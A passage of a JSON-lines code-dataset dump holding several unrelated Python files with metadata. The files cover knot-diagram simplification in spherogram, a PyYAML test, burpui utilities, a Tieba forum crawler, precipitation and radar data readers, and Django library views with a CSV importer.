The crossing strands are\n oriented consistently with respect to one of the faces which a\n vertex for the cycle.\n \"\"\"\n cycles = []\n for face0 in self.vertices:\n for dual_edge0 in self.incident(face0):\n face1 = dual_edge0(face0) \n if face0.label < face1.label:\n for dual_edge1 in self.incident(face1):\n if dual_edge0.label < dual_edge1.label and dual_edge1(face1) == face0:\n cycles.append( (common_element(face0, dual_edge0.interface),\n common_element(face0, dual_edge1.interface)))\n return cycles\n \ndef deconnect_sum(link):\n \"\"\"\n Warning: Destroys the original link.\n \"\"\"\n for cs0, cs1 in DualGraphOfFaces(link).two_cycles():\n A, a = cs0.opposite()\n B, b = cs0\n C, c = cs1.opposite()\n D, d = cs1\n A[a] = D[d]\n B[b] = C[c]\n link._build_components()\n return link.split_link_diagram(destroy_original=True)\n \n \ndef strand_pickup(link,overcrossingstrand):\n \"\"\"\n Simplifies link by optimizing the path of the longest sequence of overcrossings.\n Returns a new link and the number of crossings removed.\n \"\"\"\n for overcross in overcrossingstrand:\n startcep = overcross[0]\n length = overcross[1]\n G = link.dual_graph()\n\n #finding all crosses traversed by the overcrossing, accounting for possible self-intersection\n endpoint = startcep.next()\n crossingset = set([endpoint.crossing])\n for i in range(1,length):\n endpoint = endpoint.next()\n crossingset.add(endpoint.crossing)\n endpoint = endpoint.next()\n\n #creating list of edges of the dual graph corresponding to segments of the strand overcross\n crossgraph = nx.Graph()\n edgescrossed = []\n s = startcep\n\n\n for i in range(length+1):\n edge = (s.rotate(2),s.next())\n listOfEdges = list(G.edges)\n for j in range(len(listOfEdges)):\n edgereverse = (edge[1],edge[0])\n if(listOfEdges[j].interface == edge or listOfEdges[j].interface == edgereverse ):\n edge = listOfEdges[j]\n break\n\n edgescrossed.append(edge)\n s = s.next()\n\n\n\n #create a networkx graph with these edges, and find the connected components\n for i in range(len(edgescrossed)):\n crossgraph.add_edge(edgescrossed[i][0],edgescrossed[i][1])\n\n\n components = list(nx.connected_components(crossgraph))\n\n #collapse the connected components in original dual graph\n Gx = G.to_networkx()\n for i in range(len(components)):\n merge_vertices(Gx,components[i])\n Gx_nodes = Gx.nodes()\n\n #find shortest path between start and end points\n source = None\n dest = None\n\n for i in range(len(Gx)):\n for j in range(len((Gx_nodes[i]))):\n\n if Gx_nodes[i][j] == edgescrossed[0][0]:\n\n source = Gx_nodes[i]\n\n if Gx_nodes[i][j] == edgescrossed[-1][0]:\n\n dest = Gx_nodes[i]\n path = nx.shortest_path(Gx,source,dest)\n\n crossingsremoved = length - (len(path) - 1)\n\n if crossingsremoved == 0:\n continue\n\n #force all elements of path to be represented as tuples (to account for single elements)\n for i in range(len(path)):\n if(not type(path[i]) == tuple):\n path[i] = path[i],\n\n #creating a new list of crossings from which to rebuild the link, remove old overcross\n newcrossings = list(link.crossings)\n for i in newcrossings: #remove old orientations\n i.sign = 0\n i.directions.clear()\n toremove = startcep.next()\n for i in range(len(crossingset)):\n loose1 = toremove.rotate(1).opposite()\n loose2 = toremove.rotate(3).opposite()\n\n lc1, lc1ep = loose1.crossing, loose1.entry_point\n lc2, lc2ep = loose2.crossing, loose2.entry_point\n\n while lc1 not in newcrossings:\n lc1, lc1ep = lc1.rotate(2).opposite().crossing, lc1.rotate(2).opposite().entry_point\n while lc2 
not in newcrossings:\n lc2, lc2ep = lc2.rotate(2).opposite().crossing, lc2.rotate(2).opposite().entry_point\n lc1[lc1ep] = lc2[lc2ep]\n newcrossings.remove(toremove.crossing)\n toremove = toremove.next()\n\n\n looseend = startcep.rotate(2)\n\n #find new sequence of overcrossings to create\n for i in range(len(path)-1):\n nextedge = None\n label = 'new%d' % i\n crossingtoadd = Crossing(label)\n first = None\n for j in range(len(path[i])):\n found = False\n idict = G.incidence_dict[path[i][j]]\n for l in range(len(idict)):\n if(idict[l][0] != path[i][j]):\n totest = idict[l][0]\n else:\n totest = idict[l][1]\n\n if(totest in path[i+1]):\n found = True\n nextedge = idict[l]\n first = path[i][j]\n\n\n for i in first:\n if i == nextedge.interface[0] or i == nextedge.interface[1]:\n lec, lecep = looseend.crossing, looseend.entry_point\n crossingtoadd[1] = lec[lecep]\n ic,icep = i.crossing,i.entry_point\n ico,icoep = i.opposite().crossing, i.opposite().entry_point\n while ic not in newcrossings:\n temp = ic.crossing_strands()[icep]\n ic,icep = temp.rotate(2).opposite().crossing,temp.rotate(2).opposite().entry_point\n while ico not in newcrossings:\n temp = ico.crossing_strands()[icoep]\n ico,icoep = temp.rotate(2).opposite().crossing,temp.rotate(2).opposite().entry_point\n\n crossingtoadd[2] = ic[icep]\n crossingtoadd[0] = ico[icoep]\n\n\n\n looseend = crossingtoadd.crossing_strands()[3]\n newcrossings.append(crossingtoadd)\n\n lec, lecep = looseend.crossing, looseend.entry_point\n ec, ecep = endpoint.crossing, endpoint.entry_point\n ec[ecep] = lec[lecep]\n return Link(newcrossings), crossingsremoved\n\n return link, 0\n\ndef merge_vertices(graph,vertices):\n \"\"\"\n Merges list of vertices of networkx graph and throws together all\n edges of all the merged vertices.\n \"\"\"\n\n v = tuple(vertices)\n graph.add_node(v)\n for i in range(len(v)):\n edgelist = graph.edges(v[i])\n for j in range(len(edgelist)):\n graph.add_edge(v,edgelist[j][0])\n graph.add_edge(v,edgelist[j][1])\n graph.remove_node(v[i])\n return\n\n\ndef random_reverse_type_I(link,label):\n \"\"\"\n Randomly adds a loop in a strand, adding one crossing with given label\n \"\"\"\n \n cs1 = random.choice(link.crossing_strands())\n D = Crossing(label)\n link.crossings.append(D)\n\n cs2 = cs1.opposite()\n D[2] = D[3]\n cs1ec, cs1cep = cs1.crossing, cs1.entry_point\n D[0] = cs1ec[cs1cep]\n cs2ec, cs2cep = cs2.crossing, cs2.entry_point\n D[1] = cs2ec[cs2cep]\n \n D.rotate(random.randint(0,1)) #choose whether over or under crossing\n\ndef random_reverse_type_II(link, label1, label2):\n \"\"\"\n Randomly crosses two strands, adding two crossings, with labels label1 and label2\n \"\"\"\n\n G = DualGraphOfFaces(link)\n while True:\n face = random.choice(list(G.vertices))\n if len(face)>1:\n break\n c, d = random.sample(face,2)\n new1, new2 = Crossing(label1), Crossing(label2) \n c_cross, c_ep = c.crossing, c.entry_point\n cop_cross, cop_ep = c.opposite().crossing, c.opposite().entry_point\n d_cross, d_ep = d.crossing, d.entry_point\n dop_cross, dop_ep = d.opposite().crossing, d.opposite().entry_point\n new1[2], new1[3] = new2[0], new2[3]\n new1[0], new1[1] = dop_cross[dop_ep], c_cross[c_ep]\n new2[1], new2[2] = cop_cross[cop_ep], d_cross[d_ep]\n\n link.crossings.append(new1)\n link.crossings.append(new2)\n\ndef random_reverse_move(link,t,n):\n \"\"\"\n Performs a crossing increasing move of type t, where t is 1, 2, or 3\n n is for labeling the new crossings\n \"\"\"\n if t == 1:\n random_reverse_type_I(link,'new'+str(n))\n elif t == 2:\n 
random_reverse_type_II(link,'new'+str(n),'new'+str(n+1))\n else:\n poss_moves = possible_type_III_moves(link)\n if len(poss_moves) != 0:\n reidemeister_III(link, random.choice(poss_moves))\n\n\ndef backtrack(link, num_steps = 10):\n \"\"\"\n Randomly perform a series of Reidemeister moves which increase or preserve the\n number of crossings of a link diagram, with the number of such moves num_steps\n Use the method backtrack in the Link class.\n \"\"\"\n if len(link) == 0:\n return link\n\n n = 0\n for i in range(num_steps):\n t = random.randint(1,3)\n n += t%3\n\n random_reverse_move(link,t,n)\n \n clear_orientations(link)\n\n L = Link(link.crossings)\n link = L\n clear_orientations(link)\n relabel_crossings(link)\n return Link(link.crossings)\n \n\ndef clear_orientations(link):\n \"\"\"\n Resets the orientations on the crossings of a link to default values\n \"\"\"\n link.link_components = None\n for i in link.crossings:\n i.sign = 0\n i.directions.clear()\n\ndef relabel_crossings(link):\n \"\"\"\n Relabel the crossings as integers\n \"\"\"\n for i,cr in enumerate(link.crossings):\n cr.label = str(i)\n\n \ndef pickup_simplify(link, type_III=0):\n \"\"\"\n Performs optimize_overcrossings on a diagram, flips, and performs the\n same process on the other side of the diagram, simplifying in between\n until the process stabilizes. The boolean full_simplify indicates \n whether or not to perform a simplification that includes Reidemeister III\n type moves.\n \"\"\"\n L = link\n init_num_crossings = len(L.crossings)\n stabilized = init_num_crossings == 0\n\n def intermediate_simplify(a_link):\n if type_III:\n simplify_via_level_type_III(a_link, type_III)\n else:\n basic_simplify(a_link)\n\n intermediate_simplify(link)\n\n while not stabilized:\n L, overcrossingsremoved = L.optimize_overcrossings()\n intermediate_simplify(L)\n\n if len(L.crossings) == 0:\n break\n mirror = L.mirror()\n mirror, undercrossingsremoved = mirror.optimize_overcrossings()\n L = mirror.mirror()\n intermediate_simplify(L)\n stabilized = ((overcrossingsremoved == 0) and (undercrossingsremoved == 0)) or (len(L.crossings) == 0)\n\n link.crossings = L.crossings\n link.labels = L.labels\n link.link_components = L.link_components\n link.name = L.name\n return len(L.crossings) != init_num_crossings\n\n\n \n", "sub_path": "venv/Lib/site-packages/spherogram-1.4.1-py2.7-win32.egg/spherogram/links/simplify.py", "file_name": "simplify.py", "file_ext": "py", "file_size_in_byte": 18365, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "links.Strand", "line_number": 139, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 172, "usage_type": "call"}, {"api_name": "networkx.Graph", "line_number": 272, "usage_type": "call"}, {"api_name": "networkx.connected_components", "line_number": 296, "usage_type": "call"}, {"api_name": "networkx.shortest_path", "line_number": 318, "usage_type": "call"}, {"api_name": "links.Crossing", "line_number": 358, "usage_type": "call"}, {"api_name": "links.Link", "line_number": 399, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 425, "usage_type": "call"}, {"api_name": "links.Crossing", "line_number": 426, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 436, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 445, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 448, "usage_type": "call"}, {"api_name": "links.Crossing", "line_number": 449, 
"usage_type": "call"}, {"api_name": "random.choice", "line_number": 473, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 487, "usage_type": "call"}, {"api_name": "links.Link", "line_number": 494, "usage_type": "call"}, {"api_name": "links.Link", "line_number": 498, "usage_type": "call"}]} +{"seq_id": "490696867", "text": "# #!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time : 2020/12/1 10:04 上午\n# @Author : 百变金刚\n# @Content : test for yaml\n\n# 1. 大小写敏感\n# 2. 使用缩进表示层级关系\n# 3. 缩进时不允许使用Tab,只允许使用空格\n# 4. 缩进的空格数目不重要,只要相同层级的元素左对齐即可\n# 5. # 表示注释,从它开始到行尾都被忽略\n\nimport yaml\n\ndef traversePrint(iter, sp=0):\n # 错误方案,'asdf', 'a'都是可迭代的\n # if hasattr(iter, '__iter__'):\n # for i in iter:\n # traversePrint(i, sp+2)\n\n # 次级耦合方案\n if isinstance(iter, dict):\n for item in iter.items():\n if isinstance(item[1], dict):\n print('{}{}'.format(' '*sp, item[0],))\n traversePrint(item[1], sp+2)\n else:\n print('{}{}: {}'.format(' '*sp, item[0], item[1]))\n else:\n print('{}{}'.format(' '*sp, iter))\n\ndef testRead1():\n with open('conf/test.yml') as f:\n # conf = yaml.safe_load(f) # 此处若使用load()将会报警告,被认为是不安全的\n # conf = yaml.load(f, Loader=yaml.SafeLoader) # 一种方案(https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)\n conf = yaml.safe_load(f)\n # print(conf)\n traversePrint(conf)\n\ndef testRead2():\n # --- 对yaml分块\n with open('conf/obj.yml') as f:\n # conf = yaml.safe_load(f) # 报错,---把yml文件分成了不止一个流对象,load只能接收一个流对象\n conf = yaml.load_all(f, Loader=yaml.SafeLoader)\n # 此处若使用load()将会报警告,被认为是不安全的\n\n # 此时conf是一个生成器\n # 这段操作不能放在f的范围之外,因为生成器实时取\n for ci in conf:\n print(ci)\n\ndef testWrite1():\n import yaml\n aproject = {'name': 'Silenthand Olleander',\n 'race': 'Human',\n 'traits': ['ONE_HAND', 'ONE_EYE']\n }\n aproject = {'main.common-arch.thumbnail-service-rs': ['/bfs/{}'.format('sss')]}\n # 将python对象封装为yaml对象\n print(yaml.dump(aproject,))\n '''\n name: Silenthand Olleander\n race: Human\n traits:\n - ONE_HAND\n - ONE_EYE\n '''\n # 写入文件\n with open('conf/writeconf.yml', 'w') as f:\n yaml.dump(aproject, f)\n\ndef testWriteAll():\n # 分段(---)写yml\n # 把几个对象分装成list写yml\n obj1 = {\"name\": \"James\", \"age\": 20}\n obj2 = [\"Lily\", 19]\n\n with open('writeall.yml', 'w') as f:\n yaml.dump_all([obj1, obj2], f)\n\n\n\nif __name__ == '__main__':\n # testWriteAll()\n # testWrite1()\n # testRead2()\n testRead1()\n", "sub_path": "tools/configfile/Yamlyl/t01test.py", "file_name": "t01test.py", "file_ext": "py", "file_size_in_byte": 2718, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "yaml.safe_load", "line_number": 36, "usage_type": "call"}, {"api_name": "yaml.load_all", "line_number": 44, "usage_type": "call"}, {"api_name": "yaml.SafeLoader", "line_number": 44, "usage_type": "attribute"}, {"api_name": "yaml.dump", "line_number": 60, "usage_type": "call"}, {"api_name": "yaml.dump", "line_number": 70, "usage_type": "call"}, {"api_name": "yaml.dump_all", "line_number": 79, "usage_type": "call"}]} +{"seq_id": "234892419", "text": "# -*- coding: utf8 -*-\n\n\"\"\"\nThe following code is used to convert bytes to be human readable.\nIt was found on the Internet...\n\"\"\"\n\nimport math\nimport string\nimport sys\nimport inspect\nimport zipfile\nimport tarfile\nimport logging\n\nif sys.version_info >= (3, 0):\n long = int\n\n\nclass human_readable(long):\n \"\"\"\n define a human_readable class to allow custom formatting\n format specifiers supported :\n em : formats the size as bits in IEC format i.e. 
1024 bits (128 bytes) = 1Kib\n eM : formats the size as Bytes in IEC format i.e. 1024 bytes = 1KiB\n sm : formats the size as bits in SI format i.e. 1000 bits = 1kb\n sM : formats the size as bytes in SI format i.e. 1000 bytes = 1KB\n cm : format the size as bit in the common format i.e. 1024 bits (128 bytes) = 1Kb\n cM : format the size as bytes in the common format i.e. 1024 bytes = 1KB\n\n code from: http://code.activestate.com/recipes/578323-human-readable-filememory-sizes-v2/\n \"\"\"\n def __format__(self, fmt):\n # is it an empty format or not a special format for the size class\n if fmt == \"\" or fmt[-2:].lower() not in [\"em\", \"sm\", \"cm\"]:\n if fmt[-1].lower() in ['b', 'c', 'd', 'o', 'x', 'n', 'e', 'f', 'g', '%']:\n # Numeric format.\n return long(self).__format__(fmt)\n else:\n return str(self).__format__(fmt)\n\n # work out the scale, suffix and base\n # string.ascii_lowercase works on both Python 2 and 3 (string.lowercase is Python 2 only)\n factor, suffix = (8, \"b\") if fmt[-1] in string.ascii_lowercase else (1, \"B\")\n base = 1024 if fmt[-2] in [\"e\", \"c\"] else 1000\n\n # Add the i for the IEC format\n suffix = \"i\" + suffix if fmt[-2] == \"e\" else suffix\n\n mult = [\"\", \"K\", \"M\", \"G\", \"T\", \"P\"]\n\n val = float(self) * factor\n i = 0 if val < 1 else int(math.log(val, base)) + 1\n v = val / math.pow(base, i)\n v, i = (v, i) if v > 0.5 else (v * base, i - 1)\n\n # Identify if there is a width and extract it\n width = \"\" if fmt.find(\".\") == -1 else fmt[:fmt.index(\".\")]\n precis = fmt[:-2] if width == \"\" else fmt[fmt.index(\".\"):-2]\n\n # do the precision bit first, so width/alignment works with the suffix\n if float(self) == 0:\n return \"{0:{1}f}\".format(v, precis)\n t = (\"{0:{1}f}\" + mult[i] + suffix).format(v, precis)\n\n return \"{0:{1}}\".format(t, width) if width != \"\" else t\n\n\ndef currentframe():\n \"\"\"Return the frame object for the caller's stack frame.\"\"\"\n try:\n raise Exception\n except:\n return sys.exc_info()[2].tb_frame.f_back\n\n\nclass BUIlogging(object):\n def _logger(self, level, *args):\n if self.logger:\n \"\"\"\n Try to guess where the function was called from\n \"\"\"\n cf = currentframe()\n (frame, filename, line_number, function_name, lines, index) = inspect.getouterframes(cf)[1]\n if cf is not None:\n cf = cf.f_back\n \"\"\"\n Ugly hack to reformat the message\n \"\"\"\n ar = list(args)\n if isinstance(ar[0], str):\n ar[0] = filename + ':' + str(cf.f_lineno) + ' => ' + ar[0]\n else:\n ar = [filename + ':' + str(cf.f_lineno) + ' => {0}'.format(ar)]\n args = tuple(ar)\n self.logger.log(logging.getLevelName(level.upper()), *args)\n\n\nclass BUIcompress():\n def __init__(self, name, archive):\n self.name = name\n self.archive = archive\n\n def __enter__(self):\n self.arch = None\n if self.archive == 'zip':\n self.arch = zipfile.ZipFile(self.name, mode='w', compression=zipfile.ZIP_DEFLATED)\n elif self.archive == 'tar.gz':\n self.arch = tarfile.open(self.name, 'w:gz')\n elif self.archive == 'tar.bz2':\n self.arch = tarfile.open(self.name, 'w:bz2')\n return self\n\n def __exit__(self, type, value, traceback):\n self.arch.close()\n\n def append(self, path, arcname):\n if self.archive == 'zip':\n self.arch.write(path, arcname)\n elif self.archive in ['tar.gz', 'tar.bz2']:\n self.arch.add(path, arcname=arcname, recursive=False)\n", "sub_path": "burpui/misc/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 4216, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.version_info", "line_number": 16, "usage_type": 
"attribute"}, {"api_name": "string.lowercase", "line_number": 43, "usage_type": "attribute"}, {"api_name": "math.log", "line_number": 52, "usage_type": "call"}, {"api_name": "math.pow", "line_number": 53, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 73, "usage_type": "call"}, {"api_name": "inspect.getouterframes", "line_number": 83, "usage_type": "call"}, {"api_name": "logging.getLevelName", "line_number": 95, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 106, "usage_type": "call"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 106, "usage_type": "attribute"}, {"api_name": "tarfile.open", "line_number": 108, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 110, "usage_type": "call"}]} +{"seq_id": "143430261", "text": "from requester import Requester\nfrom common import config_reader, config_intervaltime\nimport post\nimport time\nimport spamword\nimport rediscache\n\n\nclass TiebaCrawler(Requester):\n \"\"\" Post crawler , gather information of posts in given bar\n can't get image submmited in post\n \"\"\"\n\n def __init__(self, tieba_name=\"steam\", cookie=None):\n Requester.__init__(self, tieba_name, cookie)\n\n def __avaiable_check(self):\n # response = self.session_worker\n pass\n\n def get_posts(self):\n soup = self.get_content(self.tieba_base)\n\n post_a = self.__get_posts_a(soup)\n\n url_list = [self.url_base + tag.get('href') for tag in post_a]\n\n post_content_list = self.__get_content_list(url_list)\n post_list = [post.Post(url, soup) for url, soup in zip(url_list, post_content_list)]\n\n return post_list\n\n @rediscache.postcache\n def __get_content_list(self, url_list):\n content_list = []\n\n for url in url_list:\n content_list.append(self.get_content(url))\n\n time.sleep(config_intervaltime())\n\n return content_list\n\n def __get_posts_a(self, soup):\n posts_list = soup.findAll('div', {'class': 'i'})\n posts_list = [tag.find('a') for tag in posts_list if not tag.find('span', {'class': 'light'})]\n return posts_list\n\n\nif __name__ == \"__main__\":\n cookie, _ = config_reader()\n tieba_worker = TiebaCrawler(cookie=cookie, tieba_name='dota2提问')\n posts = tieba_worker.get_posts()\n print(len(list(map(str, posts))))\n posts = tieba_worker.get_posts()\n print(len(list(map(str, posts))))\n # print(list(map(str, posts[0].reply_list)))\n", "sub_path": "crawler.py", "file_name": "crawler.py", "file_ext": "py", "file_size_in_byte": 1675, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requester.Requester", "line_number": 9, "usage_type": "name"}, {"api_name": "requester.Requester.__init__", "line_number": 15, "usage_type": "call"}, {"api_name": "requester.Requester", "line_number": 15, "usage_type": "name"}, {"api_name": "post.Post", "line_number": 29, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 40, "usage_type": "call"}, {"api_name": "common.config_intervaltime", "line_number": 40, "usage_type": "call"}, {"api_name": "rediscache.postcache", "line_number": 33, "usage_type": "attribute"}, {"api_name": "common.config_reader", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "279815866", "text": "import os\nimport numpy as np\nimport pandas as pd\nimport netCDF4 as nc\n\nhomedir = os.path.expanduser('~')\naa_dir = homedir + '/data/prcp/aa_gauges'\nwu_dir = homedir + '/data/prcp/wu_station'\nvehicle_dir = homedir + '/data/vehicle_v2'\nradar_dir = homedir + '/data/nexrad3/nc/inst_prcp_rate'\n\ndef 
read_ann_arbor_gages(aa_dir=os.path.join(homedir, aa_dir)):\n \"\"\"\n Read ann arbor gages into a single table.\n\n Parameters:\n aa_dir: The directory containing the gage data\n\n Returns:\n aa_df: A single table containing all ann arbor city gage data\n aa_locs: A table containing lat and lon info for each gage\n\n \"\"\"\n # Initialize empty dict to hold data\n d = {}\n \n # Loop through directory\n for fn in os.listdir(aa_dir):\n # Read files\n d[fn[0]] = pd.read_csv(aa_dir + '/' + fn)\n # Rename columns\n d[fn[0]].rename(columns={'Reading Date' : 'date',\n 'Rainfall (in.)' : 'prcp'},\n inplace=True)\n # Convert time column to datetime index\n d[fn[0]]['date'] = pd.to_datetime(d[fn[0]]['date'])\n d[fn[0]].set_index('date', inplace=True)\n d[fn[0]] = d[fn[0]]['prcp']\n\n # Join gages into a single dataframe\n aa_df = pd.concat([i for i in d.values()], axis=1)\n aa_df.columns = d.keys()\n # Put dates in UTC\n aa_df = aa_df.tz_localize('EST').tz_convert('UTC')\n del d\n\n aa_locs = {'C' : (42.294157, -83.754970),\n 'J' : (42.284517, -83.795354),\n 'S' : (42.253200, -83.733444),\n 'N' : (42.294157, -83.710069),\n 'B' : (42.306814, -83.754970)}\n\n aa_locs = pd.DataFrame.from_dict(aa_locs, orient='index').rename(columns={0:'lat', 1:'lon'})\n return aa_df, aa_locs\n\n\ndef read_wu_gages(wu_dir=os.path.join(homedir, wu_dir), var='HourlyPrecipIn', var_accum='dailyrainin'):\n \"\"\"\n Read Weather Underground gages into a single table.\n\n Parameters:\n wu_dir: The directory containing the gage data\n\n Returns:\n wu_df: A single table containing all weather underground gage data\n wu_locs: A table containing lat and lon info for each gage\n\n \"\"\"\n\n # Initialize empty dict to hold data\n wu_d = {}\n\n # Loop through directory\n for fn in os.listdir(wu_dir):\n station_id = fn\n if fn != 'station_locs':\n if fn in ['KMIANNAR33', 'KMISALIN8', 'KMIANNAR47', 'KMIANNAR49']:\n # Read files\n wu = pd.read_csv(os.path.join(wu_dir, fn), index_col=0).set_index('DateUTC')[var]\n wu.index = pd.to_datetime(pd.Series(wu.index)).values\n wu = wu.tz_localize('UTC')\n wu.index.name = 'time'\n wu.name = station_id\n wu_d[station_id] = wu\n else:\n df = pd.read_csv(os.path.join(wu_dir, fn), index_col=0)\n df['Time'] = pd.to_datetime(df['Time'])\n df['DateUTC'] = pd.to_datetime(df['DateUTC'])\n df.set_index('Time', inplace=True, drop=False)\n\n d = df.groupby(pd.TimeGrouper('d', closed='right'))[var_accum].diff()\n t = df.groupby(pd.TimeGrouper('d', closed='right'))['Time'].diff()\n d = d * (3600000000000 / t.astype(int))\n\n d[d < 0] = df.loc[d[d < 0].index, var_accum]\n d.name = fn\n wu = pd.concat([d, df['DateUTC']], axis=1).set_index('DateUTC')\n wu = wu.tz_localize('UTC')\n wu.index.name = 'time'\n wu_d[station_id] = wu\n\n # Concatenate separate gages\n wu_df = pd.concat([wu_d[i] for i in wu_d], axis=1)\n # Remove invalid entries\n wu_df[wu_df < 0] = np.nan\n # Read gage location file\n wu_locs = pd.read_csv(wu_dir + '/' + 'station_locs', index_col=0)\n return wu_df, wu_locs\n\ndef read_vehicle_data(veh_file):\n \"\"\"\n Read vehicle data file for a single day\n\n Parameters:\n veh_file: Path of the vehicle data as a string.\n\n Returns:\n veh: A dataframe of the vehicle data for a given day.\n \"\"\"\n\n # Read vehicle file\n veh = pd.read_csv(veh_file, header=None)\n # Fix column headings\n veh.columns = ['Device', 'Trip', 'Latitude', 'Longitude', 'Time', 'Wiper', 'GPS_Speed']\n # Convert time to datetime\n veh['Time'] = pd.to_datetime(veh['Time'])\n veh = veh.set_index('Time').tz_localize('UTC')\n 
return veh\n\ndef radar_to_panel(radar_path, var_name=None, dim_map={}, time_unit='s'):\n \"\"\"\n Reads netcdf file and converts to a pandas Panel with sorted axes\n\n Parameters:\n -----------\n radar_path: Path to netCDF dataset\n var_name: Output variable name\n\n Returns:\n --------\n 3-dimensional pandas Panel.\n \"\"\"\n with nc.Dataset(radar_path, 'r') as d:\n dims = tuple(d.dimensions.keys())\n if dim_map:\n dims = tuple([dim_map[dim] for dim in dims])\n if not var_name:\n var_name = tuple(d.variables.keys())[0]\n\n p = pd.Panel(d.variables[var_name][:,:,:], items=d.variables[dims[0]][:], major_axis=d.variables[dims[1]][:], minor_axis=d.variables[dims[2]][:])\n p.items.name, p.major_axis.name, p.minor_axis.name = dims\n p.items = pd.to_datetime(p.items, unit=time_unit)\n p = p.sort_index(0).sort_index(1).sort_index(2)\n return p\n", "sub_path": "notebooks/read_data.py", "file_name": "read_data.py", "file_ext": "py", "file_size_in_byte": 5288, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.expanduser", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 28, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 30, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 36, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 41, "usage_type": "call"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 53, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 74, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 80, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 80, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 87, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 88, "usage_type": "call"}, {"api_name": "pandas.TimeGrouper", "line_number": 91, "usage_type": "call"}, {"api_name": "pandas.TimeGrouper", "line_number": 92, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 97, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 107, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 122, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 126, "usage_type": "call"}, {"api_name": "netCDF4.Dataset", "line_number": 143, "usage_type": "call"}, {"api_name": "pandas.Panel", "line_number": 150, "usage_type": "call"}, {"api_name": "pandas.to_datetime", 
"line_number": 152, "usage_type": "call"}]} +{"seq_id": "178255606", "text": "from django.shortcuts import render\nfrom django.shortcuts import get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Book, Auteur, Genre, Edition\nfrom .form import UploadFileForm, SearchBookForm\nimport csv, io\nimport requests\n\n# Create your views here.\n\ndef index(request):\n book_list = Book.objects.all()\n context = {'book_list': book_list}\n return render(request, 'biblio/index.html', context)\n\ndef detail(request, book_id):\n book = get_object_or_404(Book, pk=book_id)\n return render(request, 'biblio/detail.html', {'book':book})\n\ndef authors(request):\n authors = Auteur.objects.all()\n return render(request, 'biblio/authors.html', {'authors':authors})\n\ndef author_detail(request,id):\n author = get_object_or_404(Auteur, pk=id)\n return render(request, 'biblio/author_detail.html', {'author':author})\n\ndef genres(request):\n genres = Genre.objects.all()\n return render(request, 'biblio/genres.html', {'genres':genres})\n\ndef genre_detail(request,id):\n genre = get_object_or_404(Genre, pk=id)\n return render(request, 'biblio/genre_detail.html', {'genre':genre})\n\ndef editions(request):\n editions = Edition.objects.all()\n return render(request, 'biblio/editions.html', {'editions':editions})\n\ndef edition_detail(request,id):\n edition = get_object_or_404(Edition, pk=id)\n return render(request, 'biblio/edition_detail.html', {'edition':edition})\n\ndef imports(request):\n if request.method == 'POST':\n file = request.POST\n return render(request, 'biblio/imports.html', {'imports':imports} )\n\n@login_required(login_url=\"/admin\")\ndef upload_file(request):\n\n if request.method == 'POST':\n form = UploadFileForm(request.POST, request.FILES)\n\n if form.is_valid():\n\n csv_file = request.FILES['file']\n data_set = csv_file.read().decode('UTF-8')\n io_string = io.StringIO(data_set)\n next(io_string)\n\n books_list= []\n for row in csv.reader(io_string, delimiter=';', quotechar='\"'):\n \n edition = Edition.objects.create(nom='Gallimard')\n genre = Genre.objects.create(nom=row[5])\n auteurs = Auteur.objects.create(nom=row[3],prenom=\"John\")\n\n book = Book.objects.create(nom=row[0],resume=row[1],ISBN=row[2],edition=edition,image_url=row[6])\n if book:\n book.genres.add(genre)\n book.auteurs.add(auteurs)\n \n books_list.append(book)\n\n 